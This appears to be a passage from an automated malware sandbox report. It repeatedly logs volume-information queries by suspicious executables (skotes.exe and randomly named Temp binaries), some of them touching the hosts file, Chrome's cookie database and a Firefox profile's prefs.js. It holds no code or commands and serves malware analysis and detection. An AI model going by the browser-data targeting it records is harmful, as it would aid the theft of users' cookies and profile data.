                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019681001\e637491e0c.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019682001\62a707bc2a.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019682001\62a707bc2a.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019683001\796ecf2647.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019683001\796ecf2647.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019684001\178ba86573.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019684001\178ba86573.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
